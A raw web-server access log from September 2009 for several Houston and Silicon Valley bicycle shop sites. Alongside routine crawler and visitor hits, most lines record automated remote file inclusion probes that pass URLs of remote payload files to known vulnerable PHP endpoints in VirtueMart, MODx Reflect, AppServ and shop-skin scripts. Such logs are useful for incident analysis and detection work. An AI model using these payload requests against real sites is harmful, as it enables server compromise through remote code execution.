124.158.127.241 - - [11/Sep/2009:04:16:15 -0700] "GET /logs/access.log%20//bbs//skin/ggambo7002_board/write.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:04:16:16 -0700] "GET /logs/access.log%20//bbs//skin/ggambo7002_board/write.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.80.195.46 - - [11/Sep/2009:04:18:43 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Embedded Web Browser from: http://bsalsa.com/; IEMB3; InfoPath.1; .NET CLR 2.0.50727; IEMB3)" "bicyclestoreshouston.com"
110.45.146.223 - - [11/Sep/2009:04:54:46 -0700] "GET /logs/access.log/errors.php?error=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.146.223 - - [11/Sep/2009:04:54:46 -0700] "GET /errors.php?error=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.146.223 - - [11/Sep/2009:04:54:46 -0700] "GET /logs/errors.php?error=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:05:00:51 -0700] "GET /logs/access.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:05:00:51 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:05:00:51 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.30.87.112 - - [11/Sep/2009:05:03:04 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
200.192.131.74 - - [11/Sep/2009:05:03:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
200.192.131.74 - - [11/Sep/2009:05:03:47 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
200.192.131.74 - - [11/Sep/2009:05:03:47 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:05:04:35 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
200.192.131.74 - - [11/Sep/2009:05:06:11 -0700] "GET /logs/access.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
219.85.63.226 - - [11/Sep/2009:05:17:43 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
219.85.63.226 - - [11/Sep/2009:05:34:01 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
219.85.63.226 - - [11/Sep/2009:05:34:01 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
219.85.63.226 - - [11/Sep/2009:05:34:01 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
81.19.66.38 - - [11/Sep/2009:05:42:34 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Sep/2009:05:42:35 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Sep/2009:05:42:35 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Sep/2009:05:42:36 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Sep/2009:05:42:37 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
65.55.211.74 - - [11/Sep/2009:05:44:55 -0700] "GET /tmp/?S=A HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
83.103.72.130 - - [11/Sep/2009:05:51:23 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://azar.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [11/Sep/2009:05:51:23 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://azar.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [11/Sep/2009:05:51:23 -0700] "GET /logs/access.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://azar.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Sep/2009:06:05:53 -0700] "GET /logs/access.log/errors.php?error=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Sep/2009:06:05:53 -0700] "GET /errors.php?error=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Sep/2009:06:05:53 -0700] "GET /logs/errors.php?error=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:01 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:02 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:02 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:02 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:07 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:07 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:21 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:21 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:13:21 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:31 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:31 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:33 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:33 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:33 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:59 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:59 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:17:59 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
94.136.37.141 - - [11/Sep/2009:06:22:07 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:06:26:23 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:06:26:24 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:06:26:24 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 2374 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:06:27:09 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 2374 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:06:27:09 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:06:27:10 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:06:29:20 -0700] "GET /logs/access.log%20///?_SERVER[DOCUMENT_ROOT]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:06:30:33 -0700] "GET /logs/access.log%20///?_SERVER[DOCUMENT_ROOT]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
69.64.84.44 - - [11/Sep/2009:06:38:43 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.64.84.44 - - [11/Sep/2009:06:38:43 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.64.84.44 - - [11/Sep/2009:06:38:43 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.64.84.44 - - [11/Sep/2009:06:47:31 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.184.252.3 - - [11/Sep/2009:06:53:20 -0700] "GET //skin/ggambo7002_board//config.php?root_dir=http://j0ecaem.webng.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.184.252.3 - - [11/Sep/2009:06:53:20 -0700] "GET /logs///skin/ggambo7002_board//config.php?root_dir=http://j0ecaem.webng.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.184.252.3 - - [11/Sep/2009:06:53:24 -0700] "GET /logs/access.log%20%20///skin/ggambo7002_board//config.php?root_dir=http://j0ecaem.webng.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.43.25 - - [11/Sep/2009:07:04:42 -0700] "GET / HTTP/1.1" 200 1764 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.svbikes.com"
72.30.161.219 - - [11/Sep/2009:07:35:16 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
72.11.145.8 - - [11/Sep/2009:07:36:26 -0700] "GET /appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Sep/2009:07:36:26 -0700] "GET /logs//appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
62.75.202.55 - - [11/Sep/2009:07:38:20 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [11/Sep/2009:07:38:20 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [11/Sep/2009:07:38:20 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [11/Sep/2009:07:38:34 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [11/Sep/2009:07:38:34 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [11/Sep/2009:07:38:34 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
72.11.145.8 - - [11/Sep/2009:07:42:38 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Sep/2009:07:45:16 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Sep/2009:07:45:16 -0700] "GET /appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Sep/2009:07:45:16 -0700] "GET /logs//appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Sep/2009:07:49:27 -0700] "GET /appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Sep/2009:07:49:27 -0700] "GET /logs//appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Sep/2009:07:49:29 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.73.164.176 - - [11/Sep/2009:07:53:36 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.73.164.176 - - [11/Sep/2009:07:53:36 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.73.164.176 - - [11/Sep/2009:07:53:36 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.73.164.176 - - [11/Sep/2009:07:54:14 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.73.164.176 - - [11/Sep/2009:07:54:14 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.73.164.176 - - [11/Sep/2009:07:54:14 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.73.164.176 - - [11/Sep/2009:08:08:02 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.73.164.176 - - [11/Sep/2009:08:08:09 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.j-vintage.com/jvntg/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.169.210.130 - - [11/Sep/2009:08:10:06 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "houstonbikeshop.com"
208.80.195.47 - - [11/Sep/2009:08:26:03 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; VNIE5 RefIE5; .NET CLR 1.1.4322)" "houstonbikeshop.com"
72.30.87.112 - - [11/Sep/2009:08:35:44 -0700] "GET /logs/ HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
94.142.128.140 - - [11/Sep/2009:08:37:10 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)" "www.svbikes.com"
94.142.128.140 - - [11/Sep/2009:08:37:13 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)" "www.svbikes.com"
94.142.128.140 - - [11/Sep/2009:08:37:14 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)" "www.svbikes.com"
72.30.161.219 - - [11/Sep/2009:08:41:02 -0700] "GET /fit.html HTTP/1.0" 200 17443 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
65.55.211.75 - - [11/Sep/2009:08:51:12 -0700] "GET /tmp/?M=D HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
69.110.0.9 - - [11/Sep/2009:09:05:25 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8" "svbikes.com"
69.110.0.9 - - [11/Sep/2009:09:05:25 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8" "svbikes.com"
69.110.0.9 - - [11/Sep/2009:09:05:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8" "svbikes.com"
114.4.8.14 - - [11/Sep/2009:09:06:29 -0700] "GET //appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Sep/2009:09:06:29 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Sep/2009:09:06:29 -0700] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Sep/2009:09:12:31 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Sep/2009:09:12:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Sep/2009:09:12:31 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Sep/2009:09:12:32 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Sep/2009:09:12:32 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.5.136 - - [11/Sep/2009:09:12:32 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Sep/2009:09:13:35 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Sep/2009:09:13:37 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Sep/2009:09:13:37 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
